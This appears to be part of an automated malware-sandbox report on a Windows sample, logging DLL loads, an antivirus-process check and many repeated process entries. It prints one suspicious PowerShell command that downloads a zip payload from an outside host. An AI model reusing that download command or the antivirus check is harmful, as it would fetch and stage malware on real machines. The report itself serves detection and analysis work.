Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.17.dr
Source:	Binary string: .pdbrc source: genindex-Symbols.html.17.dr
Source:	Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#module-pdb" title="pdb: The Python debugger for interactive interpreters."><code class="xref py py-mod docutils literal notranslate"><span class="pre">pdb</span></code></a> module now reads the <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> configuration file with source: 3.11.html.17.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System file written: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\c-api\tuple.html

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
